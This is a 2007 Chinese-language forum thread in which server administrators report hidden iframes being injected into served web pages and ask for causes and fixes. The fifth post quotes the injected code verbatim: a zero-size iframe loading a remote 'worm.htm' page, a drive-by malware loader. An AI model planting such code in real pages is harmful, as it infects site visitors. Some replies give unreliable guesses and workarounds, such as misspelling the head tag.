论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2007-01-05 23:52 |只看该作者 |倒序浏览

发现网页被嵌入木马程序
被潜入了iframe代码。连到一个带木马的网页

访问服务器上所有页面的代码都会插入该代码
但是在服务器上查看源码.没有被修改

请问可能是什么原因，该怎么解决。

文库|博客

calvin8035

白手起家

论坛徽章:: 0

2楼 [报告]

发表于 2007-01-06 03:06 |只看该作者

iframe里面的地址是ads.35012.com/123/

实在找不到原因。apache重装使用所有的新文件还是会报毒
好象是80端口的数据都会把里面的<html>后面的一段代码替换成iframe代码
但是8080的jsp网页就正常.

该从哪里找原因.怎么解决。
求救

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

1984qht

家境小康

论坛徽章:: 0

3楼 [报告]

发表于 2007-01-06 09:01 |只看该作者

你的一定是win的吧,那个毒一定是能扫描你的端口吧,杀毒吧,AVG

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

calvin8035

白手起家

论坛徽章:: 0

4楼 [报告]

发表于 2007-01-06 09:20 |只看该作者

原帖由 1984qht 于 2007-1-6 09:01 发表
你的一定是win的吧,那个毒一定是能扫描你的端口吧,杀毒吧,AVG

不是。是linux 的。郁闷。
求救呀。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

lyf088

家境小康

论坛徽章:: 1

5楼 [报告]

发表于 2007-01-07 15:27 |只看该作者

哥们,不幸啊
我的管理机子中的html文件同样也感染了
在每个html文件中插入下面的代码:
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>

不过还好,不是服务器的文件,只是其他办公室的机子.

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

xnan2

白手起家

论坛徽章:: 0

6楼 [报告]

发表于 2007-01-07 16:12 |只看该作者

我的服务器是IIS 6.0的也是这样的问题.不知道怎么回事,杀毒也杀不出来。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

xnan2

白手起家

论坛徽章:: 0

7楼 [报告]

发表于 2007-01-07 16:14 |只看该作者

有一个办法可以应急,就是把<head>改成<haed>

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

lyf088

家境小康

论坛徽章:: 1

8楼 [报告]

发表于 2007-01-07 16:37 |只看该作者

我的服务器是freebsd 5.5 ,没出现这个情况.

不知道这是什么病毒,怎样感染起来的?

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

返回列表

Chinaunix › 论坛 › IT运维 › 数据安全 › 紧急求救,在线等,网页被插

紧急求救,在线等,网页被插 [复制链接]

浏览过的版块